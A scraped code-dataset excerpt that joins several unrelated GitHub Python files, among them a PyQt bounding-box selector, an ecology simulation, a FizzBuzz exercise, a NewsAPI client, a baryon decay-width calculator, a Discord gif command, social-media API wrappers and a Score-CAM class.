#self.mode[i] = "drag_upper_left"
min_sh = (self.upper_left[i] - position).manhattanLength()
min_i = i
string = "drag_upper_left"
if (self.lower_right[i] - position).manhattanLength() < min_sh:
# close to lower right corner, drag it
#self.mode[i] = "drag_lower_right"
min_sh = (self.lower_right[i] - position).manhattanLength()
min_i = i
string = "drag_lower_right"
fl = 1
i += 1
# else:
# # clicked somewhere else, hide selection
# #self.selection.hide()
# self.selections[i].show()
# pass
print ('loop 1')
if min_sh < 50:
self.mode[min_i] = string
else:
# no visible selection, start new selection
print (len(self.selections))
self.selections.append(QtGui.QRubberBand(QtGui.QRubberBand.Rectangle, self))
self.category.append(self.reg)
self.upper_left.append(position)
self.lower_right.append(position)
self.mode.append("drag_lower_right")
self.selections[-1].setGeometry(QtCore.QRect(self.upper_left[-1], self.lower_right[-1]).normalized())
#self.color.setBrush(QtGui.QColor(255,0,0))
# self.selections[-1].setPalette(self.color)
#self.selections[-1].setStyle(QtGui.QStyleFactory.create('windowsvista'))
self.selections[-1].show()
self.id.append(self.curr_id)
if self.reg != 3:
self.curr_id += 1
# self.upper_left[self.active_bboxes] = position
# self.lower_right[self.active_bboxes] = position
# self.mode[self.active_bboxes] = "drag_lower_right"
# self.selections[self.active_bboxes].show()
#print (self.active_bboxes, self.selections[self.active_bboxes].isVisible())
self.active_bboxes += 1
print ("new", self.active_bboxes)
def mouseMoveEvent(self, event):
'''
Mouse moved. If selection is visible, drag it according to drag mode.
'''
#print ("MouseMove")
for i in range(self.active_bboxes):
if self.selections[i].isVisible():
# visible selection
if self.mode[i] == "drag_lower_right":
self.lower_right[i] = QtCore.QPoint(event.pos())
elif self.mode[i] == "drag_upper_left":
self.upper_left[i] = QtCore.QPoint(event.pos())
# update geometry
self.selections[i].setGeometry(QtCore.QRect(self.upper_left[i], self.lower_right[i]).normalized())
# painter = QtGui.QPainter()
# painter.begin(self)
# pen = QtGui.QPen(QtCore.Qt.black, 2, QtCore.Qt.DashDotDotLine)
# painter.setPen(pen) # painter.drawRect(self.upper_left[i].x(), self.upper_left[i].y(), self.selections[i].height(), self.selections[i].width())
def mouseReleaseEvent(self, event):
print ("ReleaseMouse")
# pass
self.mode = [" " for i in range(len(self.mode))]
i = 0
for s in self.selections:
print
if self.upper_left[i].x() == self.lower_right[i].x() or self.upper_left[i].y() == self.lower_right[i].y():
print ('remove')
s.hide()
self.selections.remove(s)
self.active_bboxes -= 1
i += 1
# if self.selections[self.active_bboxes-1].width() == 0 and self.selections[self.active_bboxes-1].width() == 0 :
# self.selections[self.active_bboxes-1].hide()
# self.active_bboxes -= 1
def paintEvent(self, event):
super(RubberbandEnhancedLabelMultiple, self).paintEvent(event)
qp = QtGui.QPainter()
qp.begin(self)
qp.setOpacity(0.1)
d = {0:QtGui.QColor('red'), 1:QtGui.QColor('blue'), 2:QtGui.QColor('green'), 3:QtGui.QColor('black')}
for i in range(len(self.selections)):
brush = QtGui.QBrush(QtCore.Qt.SolidPattern)
brush.setColor(d[self.category[i]])
qp.setBrush(brush)
qp.drawRect(self.upper_left[i].x(), self.upper_left[i].y(), self.selections[i].width(),
self.selections[i].height())
self.update()
qp.end()
def reset_selected(self):
for sel in self.selections:
sel.hide()
self.selections = [] #[QtGui.QRubberBand(QtGui.QRubberBand.Rectangle, self) for i in range(self.max_bboxes)]
self.active_bboxes = 0
self.upper_left = []#[QtCore.QPoint() for i in range(self.max_bboxes)]
self.lower_right = []#[QtCore.QPoint() for i in range(self.max_bboxes)]
self.mode = []#[" " for i in range(self.max_bboxes)]
def keyPressEvent(self, event):
print ("key")
if event.key()==(QtCore.Qt.Key_Backspace):
print ('ctrl z')
self.selections[self.active_bboxes].hide()
self.active_bboxes -= 1
#
# def resizeEvent(self, event):
# self.setPixmap(self._pixmap.scaled(
# self.width(), self.height(),
# QtCore.Qt.KeepAspectRatio))
# app = QtGui.QApplication([])
#
# screen_pixmap = QtGui.QPixmap('data/1.jpg')#.grabWindow(app.desktop().winId())
#
# window = QtGui.QWidget()
# layout = QtGui.QVBoxLayout(window)
# label = RubberbandEnhancedLabel()
# label.setPixmap(screen_pixmap)
# layout.addWidget(label)
# geometry = app.desktop().availableGeometry()
# window.setFixedSize(500, 500)
# window.show()
# app.exec_() | lkosh/abandoned_objects | select2.py | select2.py | py | 10,387 | python | en | code | 1 | github-code | 36 |
23331748159 | import matplotlib.pyplot as plt
from utility_functions import *
depth = 120
layers = 100
segments = 1
size_classes = 2
lam = 300
simulate = False
verbose = True
l2 = False
min_attack_rate = 10**(-3)
mass_vector = np.array([0.05, 20, 6000]) # np.array([1, 30, 300, 400, 800, 16000])
obj = spectral_method(depth, layers, segments=segments)
logn = stats.lognorm.pdf(obj.x, 1, 0)
norm_dist = stats.norm.pdf(obj.x, loc=0, scale=3)
res_start = 8*norm_dist # 0.1*(1-obj.x/depth)
res_max = 10 * norm_dist
water_start = water_column(obj, res_start, layers=layers * segments, resource_max=res_max, replacement=lam, advection=0,
diffusion=0, logistic = True)
params = ecosystem_parameters(mass_vector, obj, lam=0.3, min_attack_rate = min_attack_rate, forage_mass = 0.05/408)
params.handling_times = np.zeros(3)
eco = ecosystem_optimization(mass_vector, layers * segments, params, obj, water_start, l2=l2, movement_cost=0)
eco.population_setter(np.array([1, 0.1, 0.01]))
eco.heat_kernel_creator(10**(-1))
eco.heat_kernels[1] = eco.heat_kernels[0]
eco.heat_kernels[2] = eco.heat_kernels[0]
eco.parameters.who_eats_who[1,0] = 1
opt_sol_quad_opt = quadratic_optimizer(eco)
opt_sol = lemke_optimizer(eco)
#
plt.plot(obj.x, opt_sol[0:layers]@eco.heat_kernels[0])
plt.plot(obj.x, opt_sol[layers:2*layers]@eco.heat_kernels[0])
plt.plot(obj.x, opt_sol[2*layers:3*layers]@eco.heat_kernels[0])
plt.show()
plt.plot(obj.x, opt_sol_quad_opt[0:layers]@eco.heat_kernels[0])
plt.plot(obj.x, opt_sol_quad_opt[layers:2*layers]@eco.heat_kernels[0])
plt.plot(obj.x, opt_sol_quad_opt[2*layers:3*layers]@eco.heat_kernels[0])
plt.show()
simulator(eco, params, "proper_tritrophic", total_days=180, lemke = True) | jemff/food_web | old_sims/other_initial_conditions.py | other_initial_conditions.py | py | 1,717 | python | en | code | 0 | github-code | 36 |
8225047192 | #3 more decision problems
#FizzBuzz values
#use % to find multiples of a numner equaled to zero
number = int(input('Enter a positive integer: '))
if number % 3 == 0:
print('Fizz')
elif number % 5 == 0:
print('Buzz')
elif number % 3 == 0 and number % 5 == 0:
print('FizzBuzz')
else:
print(number)
#Another way to do this question
#this way isn't good because it doesnt have elif or else
number_str = ''
if number % 3 == 0:
number_str += 'Fizz'
if number % 5 == 0:
number_str += 'Buzz'
if number_str == '':
number_str += str(number)
| JordanRabold/Python-3.10 | fizz_buzz.py | fizz_buzz.py | py | 588 | python | en | code | 0 | github-code | 36 |
16010531173 | '''
api_test.py
Jeff Ondich, 11 April 2016
Ethan Somes, 13 April, 2017
Revised from Jeff's example for CS 257 Software Design. How to retrieve results
from an HTTP-based API, parse the results (JSON in this case),
and manage the potential errors.
'''
import sys
import argparse
import json
import urllib.request
import re
def get_headlines(source, sorting):
'''
Returns a list of headlines and authors of the articles
sorted in the way inputted. They are
organized in a dictionary in the form:
{'title':title, 'author':author}
The source parameter must one of the 70 souces formatted as seen on
https://newsapi.org/sources
The sorting can be top, latest, or popular.
Raises exceptions on network connection errors and on data
format errors. Maybe?
'''
base_url = 'https://newsapi.org/v1/articles?source='
apiKey = '&apiKey=82cf4993bd7b404abae9673a74e61d01'
base_url = base_url + source + '&sortby=' + sorting + apiKey
# url = base_url.format(language, word)
data_from_server = urllib.request.urlopen(base_url).read()
string_from_server = data_from_server.decode('utf-8')
loaded = json.loads(string_from_server)
result_list = []
article_list = loaded['articles']
for article_dictionary in article_list:
title = article_dictionary['title']
author = article_dictionary['author']
if type(author) != type(''):
raise Exception('author has wrong type: "{0}"'.format(author))
if type(title) != type(''):
raise Exception('title has wrong type: "{0}"'.format(title))
result_list.append({'title': title, 'author': author})
return result_list
def get_Description(source, title):
'''
Returns a dictionary containing the title of the article in question
and the descrtiption of it.
The source parameter must one of the 7 souces formatted as seen on
https://newsapi.org/sources
Raises exceptions on network connection errors and on data
format errors.
'''
base_url = 'https://newsapi.org/v1/articles?source='
apiKey = '&apiKey=82cf4993bd7b404abae9673a74e61d01'
url = base_url + source + apiKey
data_from_server = urllib.request.urlopen(url).read()
string_from_server = data_from_server.decode('utf-8')
loaded = json.loads(string_from_server)
article_list = loaded['articles']
result_dict = {}
description = ""
for article_dictionary in article_list:
dictEntry = re.sub("[^a-z0-9]+", "", article_dictionary['title'], flags=re.IGNORECASE)
titleEntry = re.sub("[^a-z0-9]+", "", title, flags=re.IGNORECASE)
if (dictEntry == titleEntry):
description = article_dictionary['description']
if type(description) != type(''):
raise Exception('text has wrong type: "{0}"'.format(text))
result_dict['title'] = title
result_dict['description'] = description
return result_dict
def main():
print("This program allows you to look at news headlines from many sources!")
print("The 70 news sources available and thier codes are listed here: https://newsapi.org/sources")
print("You can either search for the description of a particular article from a source,")
print("or you can search for a list of headlines from a source.")
userInput = input("Would you like a description or a list of headlines? Enter description or list. ")
source = input("Enter a news source code: ")
if userInput == "description":
title = input("What is the title of the article you want to look at?")
description_Dict = get_Description(source, title)
print("Title: " + title)
print(description_Dict['description'])
elif userInput == "list":
sorting = input("How would you like the list to be sorted? Enter top, latest, or popular. ")
headlines_list = get_headlines(source, sorting)
for dictionary in headlines_list:
print(dictionary['title'] + ": " + dictionary['author'])
if __name__ == '__main__':
main()
# When I use argparse to parse my command line, I usually
# put the argparse setup here in the global code, and then
# call a function called main to do the actual work of
# the program.
''' parser = argparse.ArgumentParser(description='Get word info from the Ultralingua API')
parser.add_argument('action',
metavar='action',
help='action to perform ("description" or "list")',
choices=['description', 'list'])
parser.add_argument('source',
metavar='source',
help='The source parameter must one of the 70 souces formatted as seen on https://newsapi.org/sources',
parser.add_argument('sorting', help='the word you want to act on')
parser.add_argument('word', help='the word you want to act on')
args = parser.parse_args()
main(args)''' | NylaWorker/TrebuchetPhysicsSimulation | CS257/API.py | API.py | py | 5,087 | python | en | code | 0 | github-code | 36 |
27254946312 | """
---------------------------------------------------------------
Authors: A. Ramirez-Morales (andres.ramirez.morales@cern.ch)
H. Garcia-Tecocoatzi
---------------------------------------------------------------
"""
from decays.decay_wrapper import decay
import decays.decay_utils_em as du
import numpy as np
class ElectroWidths:
"""
Class that administrates the decay width calculations of the hevay baryon widths done by the C++ class
The class calls the python wrapper and feeds the functions with the needed quatumn numbers
and masses
baryon FLAG: 1 -> omega, 2->cascade_6, 3->sigma,# 4 -> lambda, 5-> cascade_3
ModEx FLAG: 0 -> ground(grd), 1 -> lambda(lam), 2->rho
decPr FLAG: 0 -> ... decayProduct Flag
"""
def __init__(self, bootstrap=False, baryons='', workpath="."):
self.m_width = decay(workpath)
self.fetch_decay_masses(bootstrap)
self.channel_widths_vector = []
def total_decay_width(self, baryons, k_prim, massA, SA_val, JA_val, LA_val, SlA_val,
ModEx_val, bootstrap=False, m1=0, m2=0, m3=0):
"""
Method that calls the wrapper and sums the individual decay widths
"""
mb = m1
ms = m2
ml = m3
# ml = 299.0
# ms = 465.0
# mb = 4928.0
# k_prim = 5044.799302252
# massA = 5.935 * 1000
MassA = massA/1000.0
mbottom = mb/1000.0
mupdown = ml/1000.0
mstrange = ms/1000.0
SA_qm = SA_val
JA_qm = JA_val
LA_qm = LA_val
SlA_qm = SlA_val
LlA_qm, LrA_qm = self.orbital_projections(ModEx_val, LA_val)
baryon = self.baryon_flag(baryons)
ModEx = self.ModEx_flag(ModEx_val)
nChannels = self.n_channels(baryons)
m_lam, m_rho = self.reduced_masses(baryons, mbottom*1000, mupdown*1000, mstrange*1000)
channel_widths = ([])
alpha_lam = self.alphas(k_prim, m_lam)
alpha_rho = self.alphas(k_prim, m_rho)
for i in range(nChannels):
decPr = i+1
MassB = self.decay_mass(bootstrap, baryons, decPr)
single_decay_value = self.m_width.electro_width(MassA, SA_qm, JA_qm, LA_qm, SlA_qm, LlA_qm, LrA_qm,
MassB,
alpha_lam, alpha_rho,
mbottom, mupdown, mstrange,
baryon, ModEx, decPr)
channel_widths = np.append(channel_widths, single_decay_value)
baryon_name, ModEx_name, decPr_name = du.state_labels(baryon, ModEx, decPr, LA_qm)
if not bootstrap:
print('%6s | %10s | %12s | %5.3f | %5.3f | %5.1f | %5.1f | %5.1f | %5.1f | %5.6f '
%(baryon_name, ModEx_name, decPr_name, MassA, MassB, JA_qm, LA_qm, SA_qm, SlA_qm, single_decay_value))
# sum the individual width to obtain total width
total_decay_width = np.sum(channel_widths)
# print(alpha_lam,alpha_rho)
if not bootstrap:
print(' ****************** TOTAL ELECTROMAGNETIC WIDTH FOR', baryons, ModEx_name, round(total_decay_width,4), ' ******************')
print('-------------------------------------------------------------------------------------------------------------')
self.channel_widths_vector.append(channel_widths) # for individual decay tables, this is a list of arrays!
return total_decay_width
def orbital_projections(self, ModEx_val, LA_val):
"""
Method to fecth the orbital projection (up to P-wave)
"""
if(ModEx_val=="grd"):
LlA = LA_val
LrA = LA_val
elif(ModEx_val=="lam"):
LlA = LA_val
LrA = 0
elif(ModEx_val=="rho"):
LlA = 0
LrA = LA_val
else:
LlA = -1
LrA = -1
return LlA, LrA
def baryon_flag(self, baryons):
"""
Method to parse the baryons names to integers
"""
if(baryons=='omegas'): return 1
elif(baryons=='cascades'): return 2
elif(baryons=='sigmas'): return 3
elif(baryons=='lambdas'): return 4
elif(baryons=='cascades_anti3'): return 5
def reduced_masses(self, baryons, mb_input, ml_input, ms_input):
"""
Method to calculate reduced masses of the harmonic oscillator
"""
m_lam, m_rho=0,0
if(baryons=='omegas'):
m_rho = ms_input
m_lam = (3*ms_input*mb_input)/(2*ms_input+mb_input)
elif(baryons=='cascades' or baryons =='cascades_anti3'):
m_rho = (ml_input+ms_input)/2
m_lam = (1.5*(ml_input+ms_input)*mb_input)/(mb_input+ml_input+ms_input)
elif(baryons=='sigmas' or baryons=='lambdas'):
m_rho = ml_input
m_lam = (3*ml_input*mb_input)/(2*ml_input+mb_input)
return m_lam, m_rho
def alphas(self, k_prim, m_lam_rho):
"""
Method to calculate the decay alphas
"""
value1 = (np.sqrt(3./m_lam_rho)) * k_prim
value2 = value1*m_lam_rho
return np.sqrt(value2)/1000. # transform from MeV -> GeV
def ModEx_flag(self, ModEx_val):
"""
Method to parse the h.o mode to integers
grd=0, lam =1 , rho=2
"""
if(ModEx_val=='grd'): return 0
elif(ModEx_val=='lam'): return 1
elif(ModEx_val=='rho'): return 2
def n_channels(self, baryons):
"""
Method to set number of decay channels has each baryon
"""
if(baryons=='omegas'): return 2
elif(baryons=='cascades'): return 6
elif(baryons=='sigmas'): return 7
elif(baryons=='lambdas'): return 3
elif(baryons=='cascades_anti3'): return 6
def decay_mass(self, bootstrap, baryons, decPr):
"""
Method to fetch mass of the decay products
"""
if(baryons=='omegas'):
if(decPr==1):
if not bootstrap: return self.omega_mass
else: return np.random.choice(self.gauss_omega, size=None)
if(decPr==2):
if not bootstrap: return self.omega_s_mass
else: return np.random.choice(self.gauss_omega_s, size=None)
elif(baryons=='cascades' or baryons=='cascades_anti3'):
if(decPr==1):
if not bootstrap: return self.xi_mass
else: return np.random.choice(self.gauss_xi, size=None)
elif(decPr==2):
if not bootstrap: return self.xi_mass
else: return np.random.choice(self.gauss_xi, size=None)
elif(decPr==3):
if not bootstrap: return self.xi_p_mass
else: return np.random.choice(self.gauss_xi_p, size=None)
elif(decPr==4):
if not bootstrap: return self.xi_p_mass
else: return np.random.choice(self.gauss_xi_p, size=None)
elif(decPr==5):
if not bootstrap: return self.xi_p_s_mass
else: return np.random.choice(self.gauss_xi_p_s, size=None)
elif(decPr==6):
if not bootstrap: return self.xi_p_s_mass
else: return np.random.choice(self.gauss_xi_p_s, size=None)
elif(baryons=='sigmas'):
if(decPr==1):
if not bootstrap: return self.sigma_mass
else: return np.random.choice(self.gauss_sigma, size=None)
elif(decPr==2):
if not bootstrap: return self.sigma_mass
else: return np.random.choice(self.gauss_sigma, size=None)
elif(decPr==3):
if not bootstrap: return self.sigma_mass
else: return np.random.choice(self.gauss_sigma, size=None)
elif(decPr==4):
if not bootstrap: return self.lambda_mass
else: return np.random.choice(self.gauss_lambda, size=None)
elif(decPr==5):
if not bootstrap: return self.sigma_s_mass
else: return np.random.choice(self.gauss_sigma_s, size=None)
elif(decPr==6):
if not bootstrap: return self.sigma_s_mass
else: return np.random.choice(self.gauss_sigma_s, size=None)
elif(decPr==7):
if not bootstrap: return self.sigma_s_mass
else: return np.random.choice(self.gauss_sigma_s, size=None)
elif(baryons=='lambdas'):
if(decPr==1):
if not bootstrap: return self.lambda_mass
else: return np.random.choice(self.gauss_lambda, size=None)
elif(decPr==2):
if not bootstrap: return self.sigma_mass
else: return np.random.choice(self.gauss_sigma, size=None)
elif(decPr==3):
if not bootstrap: return self.sigma_s_mass
else: return np.random.choice(self.gauss_sigma_s, size=None)
def fetch_decay_masses(self, bootstrap):
'''
Method to fetch the decay products coming from our fit (mA)
'''
self.omega_mass = 6.06400
self.omega_s_mass = 6.09300
self.sigma_mass = 5.80500
self.sigma_s_mass = 5.83400
self.xi_p_mass = 5.92500
self.xi_p_s_mass = 5.95500
self.xi_mass = 5.80600
self.lambda_mass = 5.61400
if(bootstrap):
self.gauss_omega = np.random.normal(6.06400, 0.00600, 10000)
self.gauss_omega_s = np.random.normal(6.09300, 0.00700, 10000)
self.gauss_sigma = np.random.normal(5.80500, 0.00600, 10000)
self.gauss_sigma_s = np.random.normal(5.83400, 0.00700, 10000)
self.gauss_xi_p = np.random.normal(5.92500, 0.00500, 10000)
self.gauss_xi_p_s = np.random.normal(5.95500, 0.00500, 10000)
self.gauss_xi = np.random.normal(5.80600, 0.00700, 10000)
self.gauss_lambda = np.random.normal(5.61400, 0.00700, 10000)
| Ailierrivero/bottom-baryonsFW-copy | decays/electro_width.py | electro_width.py | py | 10,332 | python | en | code | 0 | github-code | 36 |
11831438569 | import discord
from discord.ext import commands
from discord.commands import Option
from commands.funcs.yatta_gif import yatta_gif
# List of commands here:
# /yattagif
class Gif(commands.Cog, description='Gif maker'):
def __init__(self, bot):
self.bot = bot
self.footer = "Developed by jej#6495 for Snowcodes 2022 ❄️"
@commands.slash_command()
async def yattagif(
self,
ctx: discord.ApplicationContext,
member: Option(discord.Member, "member", required=False)):
"""Get Yatta'd"""
if member is None:
member = ctx.author
url = str(member.display_avatar)
yatta_gif(url)
await ctx.respond("Loading....")
embed = discord.Embed (
title = 'I will reverse all creations!',
description = "",
colour = discord.Colour.from_rgb(247, 168, 178)
)
file = discord.File("assets/images/yatta/result.gif", filename="result.gif")
embed.set_image(url="attachment://result.gif")
embed.set_footer(text=self.footer)
await ctx.edit(content=None, file=file, embed=embed)
def setup(bot):
bot.add_cog(Gif(bot))
| jej-v/snowcodes2022 | commands/yatta.py | yatta.py | py | 1,201 | python | en | code | 0 | github-code | 36 |
22663485001 | def jugar_suma_modular(modulo, numero_inicial, numero_objetivo):
resultado = numero_inicial
while resultado != numero_objetivo:
numero = int(input("Ingresa un número para sumar: "))
resultado = (resultado + numero) % modulo
print(f"Resultado parcial: {resultado}")
print("¡Ganaste!")
modulo_juego = 7
numero_inicial_juego = 2
numero_objetivo_juego = 5
jugar_suma_modular(modulo_juego, numero_inicial_juego, numero_objetivo_juego) | Jacobo24/Trabajo_profundizacion | Juego_de_suma_modular.py | Juego_de_suma_modular.py | py | 470 | python | es | code | 0 | github-code | 36 |
38793714824 | condition=[]
count=[]
def Count(end,totalmass):
if totalmass==0:
return 1
if totalmass<0:
return 0
if [end,totalmass] in condition:
return count[condition.index([end,totalmass])]
else:
value=0
for i in range(len(masslist)):
value+=Count(masslist[i],totalmass-end)
condition.append([end,totalmass])
count.append(value)
return value
masslist=[]
with open("integer_mass_table.txt","r") as f:
for line in f:
content=line.split()
masslist.append(int(content[1]))
masslist=list(dict.fromkeys(masslist))
print(masslist)
totalmass=1024
answer=0
for i in range(len(masslist)):
answer+=Count(masslist[i],totalmass)
print(answer)
| XueningHe/Rosalind_Genome_Sequencing | PeptideNumberGivenMass.py | PeptideNumberGivenMass.py | py | 752 | python | en | code | 0 | github-code | 36 |
18852099221 | from os import environ
from time import time, sleep
import requests
import requests.auth
from requests_oauthlib import OAuth1
from .exceptions import *
class API:
def __init__(self, session=None):
self.log_function = print
self.retry_rate = 5
self.num_retries = 5
self.failed_last = False
self.force_stop = False
self.ignore_errors = False
self.common_errors = (requests.exceptions.ConnectionError,
requests.exceptions.Timeout,
requests.exceptions.HTTPError)
self.session = session
def __str__(self):
return pformat(vars(self))
def log_error(self, e):
"""
Print errors. Stop travis-ci from leaking api keys
:param e: The error
:return: None
"""
if not environ.get('CI'):
self.log_function(e)
if hasattr(e, 'response') and hasattr(e.response, 'text'):
self.log_function(e.response.text)
def _sleep(self, seconds):
"""
Sleep between requests, but don't force asynchronous code to wait
:param seconds: The number of seconds to sleep
:return: None
"""
for _ in range(int(seconds)):
if not self.force_stop:
sleep(1)
@staticmethod
def merge_params(parameters, new):
if new:
parameters = {**parameters, **new}
return parameters
def get(self, *args, **kwargs):
"""
An interface for get requests that handles errors more gracefully to
prevent data loss
"""
try:
req_func = self.session.get if self.session else requests.get
req = req_func(*args, **kwargs)
req.raise_for_status()
self.failed_last = False
return req
except requests.exceptions.RequestException as e:
self.log_error(e)
for i in range(1, self.num_retries):
sleep_time = self.retry_rate * i
self.log_function("Retrying in %s seconds" % sleep_time)
self._sleep(sleep_time)
try:
req = requests.get(*args, **kwargs)
req.raise_for_status()
self.log_function("New request successful")
return req
except requests.exceptions.RequestException:
self.log_function("New request failed")
# Allows for the api to ignore one potentially bad request
if not self.failed_last:
self.failed_last = True
raise ApiError(e)
else:
raise FatalApiError(e)
class Reddit(API):
def __init__(self, application_id, application_secret):
super().__init__()
self.retry_rate /= 2 # Because it will try reauthorise if failure
self.application_id = application_id
self.application_secret = application_secret
self.url = "https://oauth.reddit.com"
self.request_rate = 5
self.user_agent = "SocialReaper"
self.headers = {}
self.token_expiry = 0
self.requires_reauth = True
self.auth()
self.last_request = time()
def auth(self):
client_auth = requests.auth.HTTPBasicAuth('%s' % self.application_id,
'%s' % self.application_secret)
post_data = {"grant_type": "client_credentials"}
headers = {"User-Agent": self.user_agent}
try:
response = requests.post(
"https://www.reddit.com/api/v1/access_token",
auth=client_auth, data=post_data,
headers=headers)
except requests.exceptions.RequestException as e:
raise ApiError(e)
rj = response.json()
self.headers = {"Authorization": "bearer %s" % rj.get('access_token'),
"User-Agent": self.user_agent}
self.token_expiry = time() + rj.get('expires_in', 0)
def api_call(self, edge, parameters, return_results=True):
if time() > self.token_expiry + 30:
self.auth()
time_diff = time() - self.last_request
if time_diff < self.request_rate:
sleep(self.request_rate - time_diff)
self.last_request = time()
try:
req = self.get("%s/%s" % (self.url, edge), params=parameters,
headers=self.headers)
except (ApiError, FatalApiError):
try:
self.auth()
except ApiError:
pass
req = self.get("%s/%s" % (self.url, edge), params=parameters,
headers=self.headers)
if return_results:
return req.json()
def search(self, query, count=100, order="new", page='',
result_type="link", time_period="all", **params):
parameters = {"show": "all",
"q": query,
"limit": count,
"sort": order,
"type": result_type,
"t": time_period,
"after": page}
parameters = self.merge_params(parameters, params)
return self.api_call('search.json', parameters)
def subreddit(self, subreddit, count=100, category="new", page='',
time_period='all', **params):
parameters = {"limit": count,
"t": time_period,
"after": page}
parameters = self.merge_params(parameters, params)
return self.api_call('r/%s/%s.json' % (subreddit, category), parameters)
def user(self, user, count=100, order="new", page='',
result_type="overview", time_period='all', **params):
parameters = {"show": "all",
"limit": count,
"sort": order,
"type": result_type,
"t": time_period,
"after": page}
parameters = self.merge_params(parameters, params)
return self.api_call('user/%s/%s.json' % (user, result_type),
parameters)
def thread_comments(self, thread, subreddit, order="top", sub_thread=None,
**params):
parameters = {"depth": 50,
"showmore": True,
"sort": order}
parameters = self.merge_params(parameters, params)
path = None
if sub_thread:
path = 'r/%s/comments/%s/_/%s.json' % (
subreddit, thread, sub_thread)
else:
path = 'r/%s/comments/%s.json' % (subreddit, thread)
return self.api_call(path, parameters)
def more_children(self, children, link_id, sort="new",
**params):
parameters = {"api_type": "json",
"children": ",".join(children),
"link_id": link_id,
"sort": sort,
"limit_children": False
}
parameters = self.merge_params(parameters, params)
return self.api_call('api/morechildren', parameters)
class Facebook(API):
def __init__(self, api_key):
super().__init__()
self.key = api_key
self.url = "https://graph.facebook.com/v"
self.version = "2.9"
self.request_rate = 1
self.last_request = time()
def api_call(self, edge, parameters, return_results=True):
req = self.get("%s%s/%s" % (self.url, self.version, edge),
params=parameters)
time_diff = time() - self.last_request
if time_diff < self.request_rate:
sleep(self.request_rate - time_diff)
self.last_request = time()
if return_results:
return req.json()
def node_edge(self, node, edge, fields=None, params=None):
"""
:param node:
:param edge:
:param fields:
:param params:
:return:
"""
if fields:
fields = ",".join(fields)
parameters = {"fields": fields,
"access_token": self.key}
parameters = self.merge_params(parameters, params)
return self.api_call('%s/%s' % (node, edge), parameters)
def post(self, post_id, fields=None, **params):
"""
:param post_id:
:param fields:
:param params:
:return:
"""
if fields:
fields = ",".join(fields)
parameters = {"fields": fields,
"access_token": self.key}
parameters = self.merge_params(parameters, params)
return self.api_call('%s' % post_id, parameters)
def page_posts(self, page_id, after='', post_type="posts",
include_hidden=False, fields=None, **params):
"""
:param page_id:
:param after:
:param post_type: Can be 'posts', 'feed', 'tagged', 'promotable_posts'
:param include_hidden:
:param fields:
:param params:
:return:
"""
if fields:
fields = ",".join(fields)
parameters = {"access_token": self.key,
"after": after,
"fields": fields,
"include_hidden": include_hidden}
parameters = self.merge_params(parameters, params)
return self.api_call('%s/%s' % (page_id, post_type), parameters)
def post_comments(self, post_id, after='', order="chronological",
filter="stream", fields=None, **params):
"""
:param post_id:
:param after:
:param order: Can be 'ranked', 'chronological', 'reverse_chronological'
:param filter: Can be 'stream', 'toplevel'
:param fields: Can be 'id', 'application', 'attachment', 'can_comment',
'can_remove', 'can_hide', 'can_like', 'can_reply_privately', 'comments',
'comment_count', 'created_time', 'from', 'likes', 'like_count',
'live_broadcast_timestamp', 'message', 'message_tags', 'object',
'parent', 'private_reply_conversation', 'user_likes'
:param params:
:return:
"""
if fields:
fields = ",".join(fields)
parameters = {"access_token": self.key,
"after": after,
"order": order,
"fields": fields,
"filter": filter}
parameters = self.merge_params(parameters, params)
return self.api_call('%s/comments' % post_id, parameters)
class Twitter(API):
def __init__(self, api_key, api_secret, access_token, access_token_secret):
super().__init__()
self.app_key = api_key
self.app_secret = api_secret
self.oauth_token = access_token
self.oauth_token_secret = access_token_secret
self.url = "https://api.twitter.com/1.1"
self.request_rate = 5
self.auth = OAuth1(self.app_key, self.app_secret, self.oauth_token,
self.oauth_token_secret)
self.last_request = time()
def api_call(self, edge, parameters, return_results=True):
req = self.get("%s/%s" % (self.url, edge), params=parameters,
auth=self.auth)
time_diff = time() - self.last_request
if time_diff < self.request_rate:
sleep(self.request_rate - time_diff)
self.last_request = time()
if return_results:
return req.json()
def search(self, query, count=100, max_id='',
result_type="mixed", include_entities=True,
tweet_mode='extended', **params):
count = 100 if count < 100 else count
parameters = {"q": query,
"count": count,
"max_id": max_id,
"result_type": result_type,
"include_entities": include_entities,
"tweet_mode": tweet_mode}
parameters = self.merge_params(parameters, params)
return self.api_call("search/tweets.json", parameters)
def user(self, username, count=200, max_id=None, exclude_replies=False,
include_retweets=False, tweet_mode='extended', **params):
parameters = {"screen_name": username,
"count": count,
"max_id": max_id,
"exclude_replies": exclude_replies,
"include_rts": include_retweets,
"tweet_mode": tweet_mode}
parameters = self.merge_params(parameters, params)
return self.api_call("statuses/user_timeline.json", parameters)
| kavyamandaliya/SentimentAnalysis | scraper/scrap/apis.py | apis.py | py | 13,220 | python | en | code | 0 | github-code | 36 |
19786182992 | from keras import Model
import numpy as np
from scam.exceptions import InvalidState
from scam.utils import resize_activations, normalize_activations
class ScoreCAM:
def __init__(self, model_input, last_conv_output, softmax_output, input_shape, cam_batch_size=None):
"""
Prepares class activation mappings
:param model_input: input layer of CNN, normally takes batch of images as an input. Currently batch must be limited to a single image
:param last_conv_output: last convolutional layer. The last conv layer contains the most complete information about image.
:param softmax_output: flat softmax (or similar) layer describing the class certainty
:param input_shape: Expecting a batch of a single input sample 1 x M X N X ...; it is assumed that 2D image of M x N dimensions is served as an input, which can be multiplied with a 2D-mask.
:param cam_batch_size: Optional, defaults to None, which will result in inference of batches of size 32.
"""
self.model_input = model_input
self.last_conv_output = last_conv_output
self.softmax_output = softmax_output
self.last_conv_model = Model(inputs=model_input, outputs=last_conv_output)
self.softmax_model = Model(inputs=model_input, outputs=softmax_output)
self.input_shape = input_shape
self.cam_batch_size = cam_batch_size
self.normalized_maps = None
self.classes_activation_scale = None
def prepare_cam(self, input):
output_conv = self.last_conv_model.predict(input)
# Only first image from convolutions will be used
resized = resize_activations(output_conv[0], self.input_shape)
# filter_size x input_shape[0] x input_shape[1] - resized to original input dimensions
normalized_maps = normalize_activations(resized)
# repeat input
repeat_input = np.tile(input, (normalized_maps.shape[0], 1, 1, 1))
expanded_activation_maps = np.expand_dims(normalized_maps, axis=3)
masked_images = np.multiply(repeat_input, expanded_activation_maps)
# input: filter_size x input_shape[0] x input_shape[1] -> Output filter_size x Classes_Count
self.classes_activation_scale = self.softmax_model.predict(masked_images,
batch_size=self.cam_batch_size)
self.normalized_maps = normalized_maps
def get_class_heatmap(self, class_id):
if self.normalized_maps is None or self.classes_activation_scale is None:
raise InvalidState('Call prepare_cam before accessing get_class_heatmap, '
'activations must be prepared via prepare_cam')
